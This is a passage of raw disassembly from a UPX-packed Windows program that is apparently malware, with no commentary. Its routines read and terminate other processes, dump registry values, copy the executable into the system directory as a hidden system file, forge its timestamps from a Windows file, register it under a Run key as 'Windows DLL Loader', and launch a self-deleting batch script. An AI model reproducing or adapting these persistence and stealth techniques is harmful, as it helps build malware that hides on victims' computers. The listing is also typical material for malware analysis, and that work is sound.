; sub_40637C+11E�j
push [ebp+var_1AC]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: sub_40637C+3B�j
push [ebp+var_1A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40637C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset dword_418B44
push 0
push [ebp+var_4]
push offset sub_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call ds:dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call ds:dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call ds:dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call ds:dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call ds:dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call ds:dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: sub_403DF3+149�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset dword_418B5C
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset dword_418B54
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; strcat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call ds:dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset dword_41DD14
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset dword_418DE0
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset dword_41DD14
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417040 ; GetWindowsDirectoryA
push offset dword_418DE8
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_417048 ; GetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_41704C ; SetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call ds:dword_41703C ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call ds:dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call ds:dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call ds:dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_417068 ; WriteFile
push [ebp+var_28]
call ds:dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0 ; ShellExecuteA
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: UPX0:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp ds:off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push ds:off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call ds:dword_4170AC ; DeleteFileA
loc_40707C: ; DATA XREF: UPX1:0041AD4C�o
; UPX1:0041AD60�o ...
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset dword_41EBFC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
lea eax, [ebp+var_324]
push eax
call sub_406CF8
